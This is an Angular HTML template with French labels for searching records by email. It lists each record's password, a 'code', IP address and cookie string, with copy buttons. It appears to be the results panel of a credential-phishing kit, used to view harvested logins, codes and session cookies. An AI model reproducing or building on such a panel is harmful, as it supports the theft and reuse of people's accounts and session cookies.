<br>
<br>
<br>
<br>
<br>
<div class="row clearfix container-fluid center">
  <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
    <div class="card">
      <div class="body">

        <form class="container" name="searchForm" role="form" novalidate [formGroup]="searchForm" (ngSubmit)="loadPage(searchForm.get(['email'])!.value)" >
          <div class="col-md-4 center-text">
            <div class="input-group">
              <span class="input-group-addon">
                <label for="password_2">Recherche:</label>
              </span>
              <div class="form-line">
                <input type="text" class="form-control date" formControlName="email">
              </div>
              <span class="input-group-addon">
                <button type="button" class="btn btn-default btn-circle waves-effect waves-circle waves-float" (click)="loadPage(searchForm.get(['email'])!.value)" [disabled]="!searchForm.get(['email'])!.dirty || searchForm.get(['email'])!.value === '' ">
                  <em class="material-icons">search</em>
                </button>
              </span>
            </div>
          </div>
        </form>

        <div class="table-responsive">
          <div id="DataTables_Table_0_wrapper" class="dataTables_wrapper form-inline dt-bootstrap">
            <div class="alert alert-danger" *ngIf="notFound">
              <span>Pas de resultats pour '{{email}}'</span>
            </div>
            <br>
            <div class="row" *ngIf="resultList.length > 0">
              <div class="col-sm-12">
                <table class="table table-bordered table-striped table-hover js-basic-example dataTable"
                  id="DataTables_Table_0" role="grid" aria-describedby="DataTables_Table_0_info">
                  <thead>
                    <tr>
                      <th id="email">E-mail</th>
                      <th id="password">Mot de passe</th>
                      <th id="code">Code</th>
                      <th id="ipadresse">adresse IP</th>
                      <th id="cookies" class="col-md-2">Cookies</th>
                    </tr>
                  </thead>
                  <tbody>
                    <tr *ngFor="let resultat of resultList
                    | paginate: { itemsPerPage: 10, currentPage: p, totalItems: resultList.length }">
                      <td>
                        <span style="vertical-align: inherit;">{{resultat.username}}</span>
                        <button class="btn btn-link btn-sm pull-right" (click)="copyToClipboard(resultat.username)">
                          <em class="material-icons" style="height: 4px;">content_copy</em>
                        </button>
                      </td>
                      <td>
                        <span style="vertical-align: inherit;">{{resultat.password}}</span>
                        <button class="btn btn-link btn-sm pull-right" (click)="copyToClipboard(resultat.password)">
                          <em class="material-icons" style="height: 4px;">content_copy</em>
                        </button>
                      </td>
                      <td>
                        <span style="vertical-align: inherit;">{{resultat.code}}</span>
                        <button class="btn btn-link btn-sm pull-right" (click)="copyToClipboard(resultat.code)">
                          <em class="material-icons" style="height: 4px;">content_copy</em>
                        </button>
                      </td>
                      <td>
                        <span style="vertical-align: inherit;">{{resultat.ipAddress}}</span>
                        <button class="btn btn-link btn-sm pull-right" (click)="copyToClipboard(resultat.ipAddress)">
                          <em class="material-icons" style="height: 4px;">content_copy</em>
                        </button>
                      </td>
                      <td>
                        <span style="vertical-align: inherit;" id="cookie">{{resultat.cookies.substr(0, 200)}}
                          ...</span>
                        <button class="btn btn-link btn-sm pull-right" (click)="copyToClipboard(resultat.cookies)">
                          <em class="material-icons" style="height: 4px;">content_copy</em>
                        </button>
                      </td>
                    </tr>
                  </tbody>
                </table>
              </div>
            </div>
            <div class="row">
              <div *ngIf="resultList.length > 0">
                <div class="text-center">
                  <div class="d-inline-flex border-radius-fl-item mt-4 mb-0 pagination">
                    <div class="row justify-content-center">
                      <pagination-controls (pageChange)="p = $event" nextLabel="" previousLabel="">
                      </pagination-controls>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <br>
            <br>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>
